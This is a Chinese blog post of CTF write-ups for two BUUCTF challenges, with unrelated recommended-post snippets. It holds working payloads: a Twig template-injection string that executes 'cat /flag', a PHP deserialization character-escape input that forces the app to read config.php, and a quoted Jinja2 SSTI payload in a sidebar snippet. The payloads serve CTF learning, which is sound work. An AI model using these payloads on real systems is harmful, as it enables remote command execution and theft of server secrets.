BUUCTF 23

最新推荐文章于 2022-03-16 09:00:52 发布
最新推荐文章于 2022-03-16 09:00:52 发布
阅读量302 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52431855/article/details/113703827
版权

知识点

  • jinja2

  1. jinja2是Flask作者开发的一个模板系统,起初是仿django模板的一个模板引擎,为Flask提供模板支持,由于其灵活,快速和安全等优点被广泛使用。

  • Twig

  1. Twig是一款灵活、快速、安全的PHP模板引擎。

23-1 [BJDCTF2020]Cookie is so stable

做题思路

首先打开靶机之后有个提示,对我没用

然后打开 flag ,问我什么名字,输入之后,显示的是输入的值,怀疑这里有注入

尝试一下,发现是模板注入输入   {{7*7}} 得到49

然后又尝试了 {{system('ls')}} ,显示 

没啥头绪,但是看到题目说到cookie 便尝试抓包分析

依然不懂为啥子,找大佬

发现这个 

在user处尝试注入

{{7*'7'}} 回显7777777 ==> Jinja2
{{7*'7'}} 回显49 ==> Twig

判断出是哪种模板注入后,就构建payload获取 flag,

这里采用的是大佬的  

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

暂时,还没去弄明白模板注入 

23-2 [0CTF 2016]piapiapia

做题思路

打开为一个登陆页面,尝试登陆,看源代码,抓包分析

好家伙,不会

看眼WP

大佬扫到了

在config.php中有变量flag,但为空,flag应该在服务器的config.php文件中,要找可以利用的漏洞读取服务器的flag

(三)代码审计

有注册功能,且代码中要求必须注册才能进行其后的操作;
update.php中对用户填写的信息进行了一些限制,且将信息序列化保存;class.php 中的 filter 也对用户信息进行了限制.

1、update.php
(1)phone 长度为11位;
(2)nickname长度小于 10 位,且只能为字母和数字;
(3)将用户填写的 phone、email、nickname 以及上传的 文件进行序列化

<?php
require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	......

2、class.php 中的限制:

(1)update_profile 中对 new_profile 用 filter 进行了过滤;
(2)filter 中将 ‘select’, ‘insert’, ‘update’, ‘delete’, ‘where’ 等词用 ‘hacker’ 替换掉.

<?php 
......
public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}
.....

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
......

3、profile.php
(1)将序列化后的用户信息进行了反序列化,且读取了上传的 photo 文件内容
(2)用base64编码对上传文件进行了读取和显示

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));

(四)突破:php反序列化字符逃逸

PHP在反序列化时,从左往右读取数据类型及长度,且只读取其中规定长度的数据,即当数据的长度大于规定的长度,后面还有数据也不再读取,而后面不再读取的数据,就会被挤到下一个数据项中。

这里需要构造超出长度的数据,将被挤出来的数据形成可以读取config.php 的数据项。

1、构造数据
(1)选择构造数据的位置:构造数据要被挤到 photo 的位置,那么需要在 photo 前一个数据项,即 nickname 的位置,构造超出规定长度的数据;
(2)绕过限制:前面对 nickname 限制了长度为 10 ,这里要将其改为数组绕过
(3)获取构造数据长度

<?php
$profile['phone'] = '12345678990';
$profile['email'] = '123@123.com';
$profile ['nickname'] = ['abc'];
$profile['photo'] = 'config.php';
echo serialize($profile);

结果:

a:4:{s:5:"phone";s:11:"12345678990";s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:3:"abc";}s:5:"photo";s:10:"config.php";}

读 config.php 的数据,加上对前面符号的闭合的字符串,长34位:

";}s:5:"photo";s:10:"config.php";}
  • 1

即需要在 nickname 处多添加34位长的数据,才能将这段数据挤到 photo 的位置上去
(4)在 filter 进行过滤时, ‘where’ 替换成了 ‘hacker’ ,此时字符串的长度加了 1 ,若在 nickname 处填进 34 个 ‘where’ ,就会被替换成 34 个 ‘hacker’,即nickname 的长度超出了 34 位,正好把 ";}s:5:“photo”;s:10:“config.php”;} 挤到的photo的位置。
最后 nickname 的填入的结果:

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

 

2、利用base64编码读取服务器的config.php文件中的flag

(1)在register.php注册,任何登录,填写信息,在burpsuite中把nickname 改成数组,绕过检测nickname的正则在这里插入图片描述
(2)查看profile 的源码在这里插入图片描述在这里插入图片描述

痛诉我今天这题,没花时间,明天再仔细研究

借鉴WP

 

 

小杌
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF WEB ESAYLOGIN
qq_41696858的博客
03-15 5463
登录注册首想二次注入,但是注册成功以后发现连个回显点都没有,所以这条路就断了 然后随便注册一个账号,有个getflag按钮,点击发现权限不够。这里就想到要伪造身份绕过了 审计注册页面源码,发现/static/js/app.js目录 看看,发现hint /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ 百度一下,看看koa是个啥,原来是个nodejs的web框架 function login() { const username
BUUCTF--[RootersCTF2019]ImgXweb
qq_46263951的博客
08-09 202
进入页面后使用admin注册显示已经存在,那就随便使用一个用户名注册并登录后看到是一个文件上传 尝试.htaccess和.php都没有什么结果 将session用jwt解密得到 发现了我们的用户名储存在了sesion中,回想起我们注册时的提示admin已经存在,可以尝试伪造用户admin 使用目录扫描可以扫到一个robots文件 访问robots给出的文件目录,猜测这里是加密所需的密钥 再次使用jwt进行加密 将加密后的session替换掉原来的session,可以看到f...
BUUCTF_极客大挑战 2019_2
qq_45628145的博客
05-03 638
PHP 进入题目之后,提示我们存在备份文件,扫出来www.zip。 里面存在class.php、index.php、flag.php。 这些就说明这是个反序列化的题目了,分析下代码,我们需要让username=admin,而且password!=100,先序列化。 得到 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"%Namepass...
BUUCTF web admin (flask_session问题)
H4ppyD0g的博客
02-23 1370
检查源码,发现有注释<!-- you are not admin -->,应该是提示用admin账号登录。 两个功能,注册和登录,想到之前做过一个注册admin加空格的题,试了一下不成功。 然后老老实实注册一个普通用户 显示了自己的用户名,我们的目的因该是让自己的用户名变成admin才行。 change password只能修改自己账号的密码,没有漏洞。 post可能有xss漏洞,交...
BUUCTF [HCTF 2018] admin
Senimo
12-10 959
BUUCTF [HCTF 2018] admin解法一:弱密码解法二:Flask伪造Session解法三:Unicode欺骗 考点: 弱密码 Flask伪造session Unicode欺骗 启动环境: 简洁的页面和一个菜单栏,菜单栏中包含登陆、注册功能 查看网页源码,发现提示: <!-- you are not admin --> 提示需要用admin用户登陆 解法一:弱密码 尝试使用admin登陆,密码123: 登陆成功,可以得到flag 首先注册正常的账户: test test
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF部分web题目
05-06
写题记录
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
php万能密码_细说php反序列化字符逃逸
weixin_39719427的博客
11-26 177
亲爱的,关注我吧11/5文章共计4381个词预计阅读10分钟来和我一起阅读吧前言php反序列化的字符逃逸算是比较难理解的一个知识点,在最近的好几场比赛中都出现了相关的题,于是下定决心彻底理解透彻这个知识点,于是便有了这篇文章。基础知识理解字符逃逸在理解之后就能够明白,这是一种闭合的思想,它类似SQL中的万能密码,理解这种原理之后会变得特别容易。在SQL注入中,我们常用'、"来对注入点进行...
REVERSE-PRACTICE-BUUCTF-23
P1umH0的博客
02-27 500
REVERSE-PRACTICE-BUUCTF-23[2019红帽杯]Snake[BSidesSF2019]blink[De1CTF2019]Re_Sign[ACTF新生赛2020]Splendid_MineCraft [2019红帽杯]Snake unity游戏,dnSpy打开Snake\Snake_Data\Managed\Assembly-CSharp.dll 发现要载入Interface这个dll ida打开Snake\Snake_Data\Plugins\Interface.dll 交叉引用字符
细说php反序列化字符逃逸
蚁景网安学院
11-05 2618
亲爱的,关注我吧11/5文章共计4381个词预计阅读10分钟来和我一起阅读吧前言php反序列化的字符逃逸算是比较难理解的一个知识点,在最近的好几场比赛中都出现了相关的题,于是下定决心彻底...
【漏洞靶场】--Flask(Jinja2) 服务端模板注入漏洞
hello word的博客
01-06 3150
漏洞环境 SSTI 访问?name=1,触发ssti漏洞。 payload {%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}%20{%%20if%20c.__name__%20==%20%27catch_warnings%27%20%}%20{%%20for%20b%20in%20c.__init__.__globals__.values()%20%}%20{%%20if%20b.__class__%20==%20{}.__c
从一道ctf看php反序列化漏洞的应用场景
HuaZi_Myth的博客
10-17 750
目录 0x00 first 0x01 我打我自己之---序列化问题 0x02 [0CTF 2016] piapiapia 0x00 first 前几天joomla爆出个反序列化漏洞,原因是因为对序列化后的字符进行过滤,导致用户可控字符溢出,从而控制序列化内容,配合对象注入导致RCE。刚好今天刷CTF题时遇到了一个类似的场景,感觉很有意思,故有本文。...
一道ctf题关于php反序列化字符逃逸
BerL1n
07-18 2361
2019强网杯 easy_sql 这题知识点堆叠注入;以前还未遇到过 这是过滤掉的内容,因此常见的注入方式我们是不能再使用了。 然后提交试试。发现似乎是直接把返回的原始数据给返回了。 3.然后来测试一下有没有注入,似乎是有的。 /?inject=1%27or+%271%27%3D%271 /?inject=1’ or ‘1’='1 4.来检查一下过滤情况,过滤函数如下。 过滤了 select,u...
[0CTF 2016]piapiapia 反序列化逃逸/数组逃脱strlen
qq_54929891的博客
03-16 233
打开后就是一个登录框界面,不过我直接dirsearch扫一下后台,我怀疑它想混淆视野,其实根本不是注入 扫到一个www.zip,下载下来看一下 根据看函数的功能,可以知道重要文件是class.php,profile.php,update.php,config.php这四个文件 //config.php <?php $config['hostname'] = '127.0.0.1'; $config['username'] = 'root'; $config['password']..
华为HCIA-WLAN 3.0 课程视频(38 WLAN配置应用-Web.mp4)
06-18
适用于参加华为HCIA-WLAN考核的技术人员。 最新3.0 课程视频,一共59集。
protobuf-3.20.2-cp37-cp37m-macosx_10_9_x86_64.whl
最新发布
06-18
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值